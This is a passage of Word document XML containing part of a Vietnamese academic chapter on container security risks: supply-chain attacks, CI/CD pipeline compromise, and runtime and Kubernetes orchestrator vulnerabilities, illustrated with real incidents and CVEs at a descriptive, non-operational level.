    <w:p w14:paraId="46376CB9" w14:textId="78422976" w:rsidR="00197171" w:rsidRPr="00465508" w:rsidRDefault="00197171">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc235976356"/>
      <w:r w:rsidRPr="00465508">
        <w:t>Rủi ro từ tính chất bắc cầu của các thành phần phụ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="73EBCF12" w14:textId="07F60860" w:rsidR="00197171" w:rsidRPr="00482F63" w:rsidRDefault="00197171" w:rsidP="00197171">
      <w:r w:rsidRPr="00482F63">
        <w:t>Một hệ thống phần mềm hiện đại thường phụ thuộc từ 70% đến 90% vào các gói phần mềm nguồn mở tự do (FOSS). Khi lập trình viên khai báo một thư viện (Dependency) trong dự án, thư viện đó lại tiếp tục gọi đến hàng loạt thư viện con khác tạo thành một mạng lưới phụ thuộc bắc cầu (Transitive Dependencies) phức tạp. Kẻ tấn công khai thác đặc tính này bằng cách cấy mã độc vào một package nhỏ, ít người chú ý ở tầng sâu nhất. Do thiếu cơ chế minh bạch về thành phần cấu tạo phần mềm (thiếu giải pháp SBOM - Software Bill of Materials), các công cụ rà quét tĩnh thông thường rất khó phát hiện ra các mã độc ẩn giấu này, khiến chúng dễ dàng được đóng gói thẳng vào cấu trúc Layer của Container Image.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="-622619602"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00A01053">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A01053" w:rsidRPr="00482F63">
            <w:instrText xml:space="preserve"> CITATION Mot23 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A01053">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A" w:rsidRPr="00482F63">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [4]</w:t>
          </w:r>
          <w:r w:rsidR="00A01053">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="263A0357" w14:textId="69C3B662" w:rsidR="00465508" w:rsidRPr="00482F63" w:rsidRDefault="00A01053" w:rsidP="00465508">
      <w:r w:rsidRPr="00482F63">
        <w:t>Bên cạnh đó m</w:t>
      </w:r>
      <w:r w:rsidR="00465508" w:rsidRPr="00482F63">
        <w:t>ối đe dọa an ninh đối với chuỗi cung ứng container xuất phát từ việc lạm dụng và sử dụng các ảnh nền (Base Images) không đáng tin cậy. Quy trình kéo các tệp tin image từ các tài khoản công cộng chưa qua xác thực nguồn gốc trên kho lưu trữ Docker Hub tiềm ẩn nguy cơ rất cao về việc hệ thống bị nhiễm các loại mã độc ngụy trang (Malware), các cửa sau độc hại (Backdoors) hoặc các công cụ khai thác tiền mã hóa bất hợp pháp được cài cắm tinh vi từ thượng nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6836AFE6" w14:textId="5849AE71" w:rsidR="00465508" w:rsidRPr="00482F63" w:rsidRDefault="00465508" w:rsidP="00465508">
      <w:r w:rsidRPr="00482F63">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đi kèm với rủi ro về mã độc, hiện tượng lộ lọt thông tin nhạy cảm (Secrets Leakage) cũng là một kẽ hở nghiêm trọng do thói quen cấu hình không an toàn của lập trình viên. Trong quá trình xây dựng ứng dụng, các kỹ sư phát triển thường lưu trữ trực tiếp các thông tin định danh tối mật — bao gồm mật khẩu quản trị cơ sở dữ liệu, các chuỗi API keys, mã token xác thực hay thậm chí là các khóa SSH private — bên trong tệp tin cấu hình Dockerfile dưới dạng các biến môi trường hoặc các tệp tin sao lưu tạm thời. Đáng chú ý, do đặc tính kiến trúc của hệ thống tệp phân lớp (layered filesystem) cấu thành nên container, mọi trạng thái của các tầng dữ liệu phía dưới đều được ghi vết cố định. Do đó, ngay cả khi các tập tin chứa thông tin nhạy cảm này đã </w:t>
      </w:r>
      <w:r w:rsidRPr="00503FC1">
        <w:t>được thực thi lệnh xóa bỏ ở các lớp (layers) xây dựng phía sau, chúng vẫn tồn tại nguyên vẹn dưới dạng dữ liệu tĩnh ở các lớp sơ khởi bên dưới. Hệ quả là bất kỳ thực thể nào sở hữu quyền truy cập hoặc tải về tệp tin image đều có thể dễ dàng trích xuất thành công các thông tin bảo mật này, tạo điều kiện thuận lợi cho các bước tấn công leo thang tiếp theo vào hệ thống hạ tầng</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C94DA10" w14:textId="27AD7042" w:rsidR="00197171" w:rsidRPr="00482F63" w:rsidRDefault="00197171">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc235976357"/>
      <w:r w:rsidRPr="00482F63">
        <w:t>Thao túng quy trình kiểm soát của đường ống CI/CD (Pipeline Compromise)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="4619539A" w14:textId="266F196B" w:rsidR="00EA079F" w:rsidRPr="00EA079F" w:rsidRDefault="00EA079F" w:rsidP="00EA079F">
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve">Đường ống Tích hợp và Triển khai liên tục (CI/CD Pipeline) đóng vai trò là mắt xích phân phối cốt lõi trong toàn bộ chuỗi cung ứng ứng dụng container hóa. Do tính chất tự động hóa cao và nắm giữ các mã token đặc quyền, phân lớp này trở thành mục tiêu ưu tiên của các kỹ thuật tấn công phức tạp thông qua hai phương thức thao túng chính: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A912E9" w14:textId="77777777" w:rsidR="00EA079F" w:rsidRPr="00EA079F" w:rsidRDefault="00EA079F" w:rsidP="00EA079F">
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve">Phương thức thứ nhất là chiếm đoạt tài khoản nhà phát triển dựa trên các kỹ thuật giả mạo tinh vi (Phishing) hoặc rà quét cấu phần lỏng lẻo nhằm chiếm đoạt Token mang quyền quản trị hệ thống quản lý mã nguồn như GitHub hay GitLab. Một minh chứng điển hình trong thực tế là cuộc tấn công mạng nhắm vào nền tảng </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Codecov</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve"> vào năm 2021. Trong sự kiện này, tin tặc đã chiếm đoạt thành công thông tin xác thực (Credentials) từ đường ống CI/CD, sau đó chỉnh sửa trái phép script bash được sử dụng trong hệ thống build của họ. Lỗ hổng này cho phép kẻ tấn công âm </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">thầm trích xuất hàng loạt secrets, mã token và các biến môi trường từ môi trường CI/CD của hàng ngàn khách hàng sử dụng dịch vụ của Codecov. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754757EC" w14:textId="77777777" w:rsidR="00EA079F" w:rsidRPr="00EA079F" w:rsidRDefault="00EA079F" w:rsidP="00EA079F">
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve">Phương thức thứ hai có mức độ nguy hiểm cao hơn là thao túng kịch bản Build (Workflow Manipulation) bằng cách chèn trực tiếp các đoạn script độc hại vào file cấu hình luồng công việc, ví dụ như cấu trúc file GitHub Actions YAML. Khi quy trình tự động được kích hoạt, đoạn mã độc này sẽ tự động thực thi song song trong quá trình hệ thống biên dịch mã nguồn để cấy backdoor vào Artifact (thành phần đầu ra) ngay trước khi tiến hành đóng gói thành Container Image và đẩy lên Registry. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04EC6C" w14:textId="243A40B6" w:rsidR="00EA079F" w:rsidRPr="00EA079F" w:rsidRDefault="00EA079F" w:rsidP="00EA079F">
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve">Chiến dịch tấn công chuỗi cung ứng khét tiếng nhắm vào tập đoàn </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SolarWinds (2020)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve"> là dẫn chứng kinh điển cho phương thức này. Kẻ tấn công thuộc nhóm APT đã can thiệp trực tiếp vào hệ thống build CI/CD thông qua một mã độc có tên là </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SUNSPOT</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:t>. Mã độc này hoạt động một cách im lặng, liên tục giám sát tiến trình biên dịch phần mềm và tự động thay thế file mã nguồn sạch bằng file chứa cửa sau (Backdoor SUNBURST) ngay trong quy trình build sản phẩm, trước khi tệp tin đầu ra được ký số và phân phối đến hơn 18.000 khách hàng trên toàn cầu.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1536959081"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00AA5398">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AA5398" w:rsidRPr="00AA5398">
            <w:instrText xml:space="preserve"> CITATION Cyb20 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00AA5398">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [5]</w:t>
          </w:r>
          <w:r w:rsidR="00AA5398">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="50EED675" w14:textId="373970DD" w:rsidR="00EA079F" w:rsidRPr="00EA079F" w:rsidRDefault="00EA079F" w:rsidP="00EA079F">
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve">Gần đây hơn, vụ khai thác lỗ hổng cấu hình sai trên hệ thống CI/CD của dự án </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PyTorch (2022)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve"> cũng cho thấy hacker đã thành công chèn một dependency độc hại (Malicious Dependency) trùng tên vào quy trình build tự động, khiến mã độc tự động đóng gói vào package phân phối mà hệ thống không hề phát hiện ra.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1666286251"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00AA5398">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AA5398" w:rsidRPr="00AA5398">
            <w:instrText xml:space="preserve"> CITATION Cod21 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00AA5398">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> [6]</w:t>
          </w:r>
          <w:r w:rsidR="00AA5398">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="36A6E7D5" w14:textId="0A751B2D" w:rsidR="00197171" w:rsidRPr="00175415" w:rsidRDefault="00EA079F" w:rsidP="0056158A">
      <w:r w:rsidRPr="00EA079F">
        <w:t xml:space="preserve">Các sự kiện thực tế trên chứng minh rằng việc thao túng đường ống CI/CD có thể giúp tin tặc dễ dàng vượt qua hoàn toàn các công cụ kiểm duyệt bảo mật truyền thống ở giai đoạn sau, biến các cấu phần phần mềm chính thống thành công cụ phát tán mã độc trên diện rộng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B632C7A" w14:textId="6F785080" w:rsidR="00197171" w:rsidRPr="00465508" w:rsidRDefault="00197171">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc235976358"/>
      <w:r w:rsidRPr="00465508">
        <w:t>Thách thức từ độ trễ kỹ thuật và Quản lý An ninh Mã nguồn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="16ADFD7E" w14:textId="77777777" w:rsidR="00197171" w:rsidRDefault="00197171" w:rsidP="00197171">
      <w:r>
        <w:t xml:space="preserve">Theo các tiêu chuẩn đánh giá an ninh nguồn mở hiện đại (như dự án </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OSSF Scorecard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của Open Source Security Foundation), mức độ kiên cố của một chuỗi cung ứng phụ thuộc rất lớn vào các chỉ số an ninh kỹ thuật (Security Metrics) bao </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>gồm: chính sách duyệt mã (Code Review), bảo mật nhánh (Branch Protection) và quản lý token đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF0322" w14:textId="35B0C8E1" w:rsidR="00026BE1" w:rsidRPr="00DE4E85" w:rsidRDefault="00197171" w:rsidP="00197171">
      <w:r>
        <w:t xml:space="preserve">Sự tồn tại của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Độ trễ kỹ thuật (Technical Lag)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — tức khoảng thời gian chậm trễ giữa lúc một dependency thượng nguồn ra mắt bản vá lỗ hổng cho đến khi nhà phát triển thực tế cập nhật nó vào Dockerfile — chính là kẽ hở thời gian (Window of Opportunity) lớn nhất để hacker tiến hành khai thác. Do đó, việc chỉ thực hiện rà quét lỗ hổng tĩnh (Vulnerability Scanning) đơn thuần tại một thời điểm trước khi triển khai (Deployment) là hoàn toàn chưa đủ để đối phó với các cuộc tấn công chuỗi cung ứng đa tầng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957E467" w14:textId="021DCFF4" w:rsidR="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc235976359"/>
      <w:r w:rsidRPr="00197171">
        <w:t>Lỗ hổng bảo mật trong lớp Container Runtime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="7249CD48" w14:textId="3BE92650" w:rsidR="00DB467F" w:rsidRPr="00DB467F" w:rsidRDefault="00DB467F" w:rsidP="00DB467F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB467F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sự nguy hiểm của các lỗ hổng tại lớp thực thi này đã được chứng minh qua nhiều sự kiện an ninh mạng nghiêm trọng trên thế giới. Đối với lỗ hổng thoát chuồng do thiết kế phần mềm, một minh chứng điển hình và kinh điển nhất là mã lỗi CVE-2019-5736 tồn tại trong trình thực thi tầng thấp runc. Lỗ hổng này cho phép kẻ tấn công sở hữu quyền root bên trong container tiến hành ghi đè tệp lệnh thực thi của chính lớp runc trên host vật lý ngay khi container tương tác với hệ thống (ví dụ: khi quản trị viên chạy lệnh docker exec). Ngay sau khi tệp tin runc bị thao túng, bất kỳ hành động khởi tạo container nào tiếp theo trên máy chủ cũng sẽ vô tình kích hoạt mã độc của hacker, trao cho họ quyền kiểm soát tối cao (root) của toàn bộ hệ điều hành Host OS.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="1816997523"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Nat19 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D2786A" w:rsidRPr="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="2725653D" w14:textId="38541506" w:rsidR="00DB467F" w:rsidRPr="00DB467F" w:rsidRDefault="00DB467F" w:rsidP="00DB467F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB467F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bên cạnh runc, trình điều phối thực thi mức cao containerd cũng từng ghi nhận lỗ hổng thoát chuồng nghiêm trọng mang định danh CVE-2020-15257. Lỗ hổng này xuất hiện khi container sử dụng chung không gian mạng của host (--net=host) kết hợp với việc tiến trình containerd-shim expose API Unix domain socket của nó bên trong container dưới quyền root. Kẻ tấn công từ bên trong container có thể kết nối trực tiếp đến socket này, gửi lệnh khởi tạo một container mới mang cấu hình đặc quyền cao hơn, từ đó bẻ gãy hoàn toàn ranh giới cô lập và kiểm soát máy chủ vật lý.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="599688127"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Nat20 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D2786A" w:rsidRPr="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="65612A90" w14:textId="53482307" w:rsidR="00DB467F" w:rsidRPr="00DB467F" w:rsidRDefault="00DB467F" w:rsidP="00DB467F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB467F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Không dừng lại ở các lỗi cấu hình sai từ phía quản trị viên hay lỗi từ logic phần mềm runtime, các cuộc tấn công thoát chuồng trong thực tế còn lợi dụng các lỗ hổng của chính nhân Linux (Kernel Vulnerabilities). Vụ khai thác lỗ hổng Dirty Pipe (CVE-2022-0847) là một ví dụ tiêu biểu, cho phép một tiến trình không có đặc quyền bên trong container có thể ghi đè dữ liệu vào các tệp tin cấu hình read-only của hệ điều hành máy chủ (như file /etc/passwd). Bằng cách này, tin tặc dễ dàng tiêm một tài khoản root mới vào hệ thống host để thoát chuồng thành công.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="550277248"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Max22 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D2786A" w:rsidRPr="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="7B505874" w14:textId="5BAAC1E8" w:rsidR="00DB467F" w:rsidRPr="00DB467F" w:rsidRDefault="00DB467F" w:rsidP="00DB467F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB467F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Các sự kiện và mã lỗi thực tế kể trên là minh chứng rõ ràng cho thấy, lớp Container Runtime dù được thiết kế kiên cố nhưng nếu tồn tại các kẽ hở phân tầng kiến trúc hoặc sự lơ là trong cấu hình đặc quyền của con người, nó sẽ lập tức biến thành mục tiêu khai thác có mức độ ảnh hưởng diện rộng, làm sụp đổ hoàn toàn mọi rào cản cô lập của Namespaces và cgroups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334C4E8E" w14:textId="59986771" w:rsidR="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc235976360"/>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lỗ hổng bảo mật trong Hệ điều phối</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="5D38FE8D" w14:textId="75B5376E" w:rsidR="00D2786A" w:rsidRPr="00D2786A" w:rsidRDefault="00D2786A" w:rsidP="0056158A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2786A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sự nguy hiểm của các kẽ hở an ninh trên tầng điều phối (Orchestrator) không chỉ dừng lại ở mặt lý thuyết mà đã bị các nhóm tin tặc khai thác triệt để trong thực tế nhằm thực hiện các chiến dịch tấn công quy mô lớn. Đối với rủi ro liên quan đến API Server tiếp xúc công khai không kiểm soát, một lỗ hổng nghiêm trọng mang định danh CVE-2018-1002105 (còn gọi là lỗ hổng Kubernetes Privilege Escalation) là minh chứng điển hình cho khả năng thao túng toàn cụm. Lỗ hổng này cho phép kẻ tấn công chưa được xác thực thực hiện gửi các yêu cầu đặc biệt qua cổng API Server, lạm dụng cơ chế kết nối thiết lập sẵn (Connection Upgrade) để thiết lập một kênh giao tiếp trực tiếp với các backend server (như Kubelet) chạy trên các Worker Node. Thông qua kênh này, tin tặc có thể thực thi các lệnh tùy ý với đặc quyền tối cao mà hoàn toàn vượt qua mọi bước kiểm tra xác thực hay phân quyền của hệ thống.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="728733905"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Nat18 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="49E0499F" w14:textId="782AAEDC" w:rsidR="00D2786A" w:rsidRPr="00D2786A" w:rsidRDefault="00D2786A" w:rsidP="00D2786A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2786A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bên cạnh đó, việc cấu hình sai lệch cổng dịch vụ của cấu phần Kubelet (thường vận hành mặc định tại cổng 10250 hoặc 10255) ra ngoài Internet mà không kích hoạt tính năng xác thực người dùng (--anonymous-auth=false) cũng là một kẽ hở bị khai thác nhiều nhất. Trong chiến dịch tấn công phát tán phần mềm đào tiền ảo khét tiếng </w:t>
      </w:r>
      <w:r w:rsidRPr="00D2786A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mang tên Hildegard (2021) do nhóm hacker TeamTNT thực hiện, tin tặc đã dò quét diện rộng trên không gian mạng để tìm kiếm các cụm Kubernetes cấu hình sai lỏng lẻo. Ngay khi phát hiện các cổng Kubelet API mở công khai, chúng đã gửi lệnh trực tiếp đến Node để khởi tạo các Pod độc hại, thực hiện di chuyển ngang sang các Pod lân cận nhằm mục đích đánh cắp Service Account Token và chiếm quyền điều khiển toàn bộ cluster doanh nghiệp.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="1994364846"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Pal21 \l 1033 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="00D2786A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="76F511AF" w14:textId="7F729F81" w:rsidR="00D2786A" w:rsidRPr="00D2786A" w:rsidRDefault="00D2786A" w:rsidP="00D2786A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2786A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
